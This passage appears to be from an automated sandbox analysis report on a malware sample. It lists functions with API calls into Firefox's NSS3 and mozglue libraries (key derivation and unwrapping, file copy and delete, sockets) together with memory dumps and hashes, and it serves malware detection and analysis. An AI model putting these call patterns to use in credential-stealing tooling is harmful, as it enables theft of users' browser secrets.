                                                                                          • Instruction Fuzzy Hash: F6318EB1801218ABCB14EB90CC86FDEB778AF54314F40419EF20962191DF786B88CF69
                                                                                          Function 6CC0CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CC0CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC0CC7B), ref: 6CC0CD7A
                                                                                            • Part of subcall function 6CC0CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC0CD8E
                                                                                            • Part of subcall function 6CC0CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC0CDA5
                                                                                            • Part of subcall function 6CC0CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC0CDB8
                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC0CCB5
                                                                                          • memcpy.VCRUNTIME140(6CCA14F4,6CCA02AC,00000090), ref: 6CC0CCD3
                                                                                          • memcpy.VCRUNTIME140(6CCA1588,6CCA02AC,00000090), ref: 6CC0CD2B
                                                                                            • Part of subcall function 6CB29AC0: socket.WSOCK32(?,00000017,6CB299BE), ref: 6CB29AE6
                                                                                            • Part of subcall function 6CB29AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB299BE), ref: 6CB29AFC
                                                                                            • Part of subcall function 6CB30590: closesocket.WSOCK32(6CB29A8F,?,?,6CB29A8F,00000000), ref: 6CB30597
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                          • API String ID: 1231378898-412307543
                                                                                          • Opcode ID: 00382c2956a32ebbf2605304e6a21f2f1e491b9cb2e2a7ee43928285871bbc54
                                                                                          • Instruction ID: 832453e8973446760826f83fc0bb2c547af967a823f3dbae60ad592a7c9c6715
                                                                                          • Opcode Fuzzy Hash: 00382c2956a32ebbf2605304e6a21f2f1e491b9cb2e2a7ee43928285871bbc54
                                                                                          • Instruction Fuzzy Hash: DB1151B5B00250DFDB009FEDAC4E74A3AB89346798F541129E50ACBB41F771C4248BEA
                                                                                          Function 004187F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00418FBE,00000000), ref: 004187FB
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00418FBE,00000000), ref: 00418802
                                                                                          • wsprintfW.USER32 ref: 00418818
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcesswsprintf
                                                                                          • String ID: %hs
                                                                                          • API String ID: 659108358-2783943728
                                                                                          • Opcode ID: 79e9d64faf86ba83e26f0357b0342198ccb0edd89fdd2a8e15abc92a0c7754c1
                                                                                          • Instruction ID: ed9823074eed6dc814ef0c36eacf0fed31b39f083cef978cb02bde33a7ef5422
                                                                                          • Opcode Fuzzy Hash: 79e9d64faf86ba83e26f0357b0342198ccb0edd89fdd2a8e15abc92a0c7754c1
                                                                                          • Instruction Fuzzy Hash: DAE0EC75A40208FBD720EF94ED0AE6D77A9EB04711F100154FE0997290DA719E119BA9
                                                                                          Function 004136EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00413445
                                                                                          • StrCmpCA.SHLWAPI(?,00420F40), ref: 00413457
                                                                                          • StrCmpCA.SHLWAPI(?,00420F44), ref: 0041346D
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413777
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0041378C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileNextlstrcat
                                                                                          • String ID: 18A$P2#v
                                                                                          • API String ID: 3840410801-2896276102
                                                                                          • Opcode ID: 5412f452d6844f3e8f7990d60fe01954119fb5dc755b454d7fabaf6fcbe3c193
                                                                                          • Instruction ID: 37f096532bd63c7a6543046c1d18d9a97d222ba567e71f558b3b71d2575676c5
                                                                                          • Opcode Fuzzy Hash: 5412f452d6844f3e8f7990d60fe01954119fb5dc755b454d7fabaf6fcbe3c193
                                                                                          • Instruction Fuzzy Hash: 26D05BB150410D5BCB20EF54EE589EE7339AF54355F0041C9F40E97150EB349B85CF95
                                                                                          Function 6CA70C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA70CD5
                                                                                            • Part of subcall function 6CA5F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CA5F9A7
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA70D40
                                                                                          • free.MOZGLUE ref: 6CA70DCB
                                                                                            • Part of subcall function 6CA45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CA45EDB
                                                                                            • Part of subcall function 6CA45E90: memset.VCRUNTIME140(6CA87765,000000E5,55CCCCCC), ref: 6CA45F27
                                                                                            • Part of subcall function 6CA45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CA45FB2
                                                                                          • free.MOZGLUE ref: 6CA70DDD
                                                                                          • free.MOZGLUE ref: 6CA70DF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                          • String ID:
                                                                                          • API String ID: 4069420150-0
                                                                                          • Opcode ID: 0a08e9f73cc36ca8be1c97fd3f70692c386261fcc46438632b49311e7c0fd07a
                                                                                          • Instruction ID: ec8e5de4aa76f6844f07b0f8529df3ac6ac6c3d7bc79fd252579df247908a1f8
                                                                                          • Opcode Fuzzy Hash: 0a08e9f73cc36ca8be1c97fd3f70692c386261fcc46438632b49311e7c0fd07a
                                                                                          • Instruction Fuzzy Hash: 614138759187809BD320CF29C28179AFBE5BFC9714F518A2EE8D887711DB709489CB92
                                                                                          Function 6CA7CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7CDA4
                                                                                            • Part of subcall function 6CA3CA10: malloc.MOZGLUE(?), ref: 6CA3CA26
                                                                                            • Part of subcall function 6CA7D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CA7CDBA,00100000,?,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7D158
                                                                                            • Part of subcall function 6CA7D130: InitializeConditionVariable.KERNEL32(00000098,?,6CA7CDBA,00100000,?,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7D177
                                                                                          • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7CDC4
                                                                                            • Part of subcall function 6CA77480: ReleaseSRWLockExclusive.KERNEL32(?,6CA815FC,?,?,?,?,6CA815FC,?), ref: 6CA774EB
                                                                                          • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7CECC
                                                                                            • Part of subcall function 6CA3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CA3CAA2
                                                                                            • Part of subcall function 6CA6CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CA7CEEA,?,?,?,?,00000000,?,6CA6DA31,00100000,?,?,00000000), ref: 6CA6CB57
                                                                                            • Part of subcall function 6CA6CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CA6CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CA7CEEA,?,?), ref: 6CA6CBAF
                                                                                          • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CA6DA31,00100000,?,?,00000000,?), ref: 6CA7D058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                          • String ID:
                                                                                          • API String ID: 861561044-0
                                                                                          • Opcode ID: 2f2d1590de75b956a5a83fe26463c7032f93187af740fbbffab6c89db0e08e2e
                                                                                          • Instruction ID: 30ece3400e3600209fb5aca2a5cde2be8140d8bf634147d05ddf5b40795cc0b3
                                                                                          • Opcode Fuzzy Hash: 2f2d1590de75b956a5a83fe26463c7032f93187af740fbbffab6c89db0e08e2e
                                                                                          • Instruction Fuzzy Hash: 51D18D75A04B069FD718CF28C580B99F7F1BF89308F05862DD8598B712EB31A9A5CB91
                                                                                          Function 0040D240 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00418600: GetSystemTime.KERNEL32(?,007F1C10,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D2C1
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D4D8
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D4EC
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D56B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                          • String ID:
                                                                                          • API String ID: 211194620-0
                                                                                          • Opcode ID: 7df76863ef35d90fa605c3499f160255262f0ca4630cfb4d6adf28faeb46e6b1
                                                                                          • Instruction ID: 8325bb90350937c6619b4da0629272dcf0a8b11a564c510209fa9f55f19f5abf
                                                                                          • Opcode Fuzzy Hash: 7df76863ef35d90fa605c3499f160255262f0ca4630cfb4d6adf28faeb46e6b1
                                                                                          • Instruction Fuzzy Hash: CF916472911108ABCB14FBB1DC56EEE7338AF54318F50416EF40772091EF786A98CB6A
                                                                                          Function 6CBCAC80 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFD074,00000000), ref: 6CBCAD13
                                                                                          • memcmp.VCRUNTIME140(?,?,?), ref: 6CBCAD65
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCAD95
                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CBCADC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item_Util$CopyErrorZfreememcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2638228310-0
                                                                                          • Opcode ID: ab5fce3bc8d32387c256c89ade78b9e8f1dcc3193d322434e2428f44ad8186d7
                                                                                          • Instruction ID: ada2c888a2237bdd35030a4530014f68a0cbdcef1f61b997b5f9d7842b1f37f4
                                                                                          • Opcode Fuzzy Hash: ab5fce3bc8d32387c256c89ade78b9e8f1dcc3193d322434e2428f44ad8186d7
                                                                                          • Instruction Fuzzy Hash: 6C41B271B00268ABDB10CF69DC85FEFB7B8EF45718F540125ED15AB681E730A944CBA2
                                                                                          Function 6CC04FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CAE85D2,00000000,?,?), ref: 6CC04FFD
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC0500C
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC050C8
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC050D6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _byteswap_ulong
                                                                                          • String ID:
                                                                                          • API String ID: 4101233201-0
                                                                                          • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                          • Instruction ID: 2a69b867a278ba409a83952957d33506a7ea8544fc814e2b4b5354c703c8f5b4
                                                                                          • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                          • Instruction Fuzzy Hash: 90414CB2A402158BDB18CF18DC917AAB7E1BF4431C71D466DD84ACBB02F779E891CB85
                                                                                          Function 6CBBCF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6CBBD01E
                                                                                            • Part of subcall function 6CB8E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB8E5A0
                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6CBBD055
                                                                                            • Part of subcall function 6CB8ADC0: TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE10
                                                                                            • Part of subcall function 6CB8ADC0: EnterCriticalSection.KERNEL32(?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE24
                                                                                            • Part of subcall function 6CB8ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB6D079,00000000,00000001), ref: 6CB8AE5A
                                                                                            • Part of subcall function 6CB8ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE6F
                                                                                            • Part of subcall function 6CB8ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE7F
                                                                                            • Part of subcall function 6CB8ADC0: TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEB1
                                                                                            • Part of subcall function 6CB8ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEC9
                                                                                          • PK11_PubUnwrapSymKey.NSS3(?,00000000,6CBBCC55,00000107,00000000), ref: 6CBBD079
                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBBD08C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
                                                                                          • String ID:
                                                                                          • API String ID: 324975836-0
                                                                                          • Opcode ID: 23a08a828dcb224faed08dd63a9f0d5d5190caa5450a2ae4b2df0fe1ef0be4a3
                                                                                          • Instruction ID: 5353fa8225807e80232e4a7522c3b71545bd4854fdbbbed690b99adfcebba606
                                                                                          • Opcode Fuzzy Hash: 23a08a828dcb224faed08dd63a9f0d5d5190caa5450a2ae4b2df0fe1ef0be4a3
                                                                                          • Instruction Fuzzy Hash: 6141A2B1901219DBE710CF29DC40BA9F7F9FF44308F05469AE90CA7751E7359A86CB91
                                                                                          Function 6CBB2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,?,6CBB1289,?), ref: 6CBB2D72
                                                                                            • Part of subcall function 6CBB3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CBB2CA7,E80C76FF,?,6CBB1289,?), ref: 6CBB33E9
                                                                                            • Part of subcall function 6CBB3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CBB342E
                                                                                          • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBB1289,?), ref: 6CBB2D61
                                                                                            • Part of subcall function 6CBB0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBB0B21
                                                                                            • Part of subcall function 6CBB0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBB0B64
                                                                                          • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CBB1289,?), ref: 6CBB2D88
                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CBB1289,?), ref: 6CBB2DAF
                                                                                            • Part of subcall function 6CB6B8F0: PR_CallOnceWithArg.NSS3(6CCA2178,6CB6BCF0,?), ref: 6CB6B915
                                                                                            • Part of subcall function 6CB6B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CB6B933
                                                                                            • Part of subcall function 6CB6B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CB6B9C8
                                                                                            • Part of subcall function 6CB6B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CB6B9E1
                                                                                            • Part of subcall function 6CBB0A50: SECOID_GetAlgorithmTag_Util.NSS3(6CBB2A90,E8571076,?,6CBB2A7C,6CBB21F1,?,?,?,00000000,00000000,?,?,6CBB21DD,00000000), ref: 6CBB0A66
                                                                                            • Part of subcall function 6CBB3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CBB2D1E,?,?,?,?,00000000,?,?,?,?,?,6CBB1289), ref: 6CBB3348
                                                                                            • Part of subcall function 6CBB06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CBB2E70,00000000), ref: 6CBB0701
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
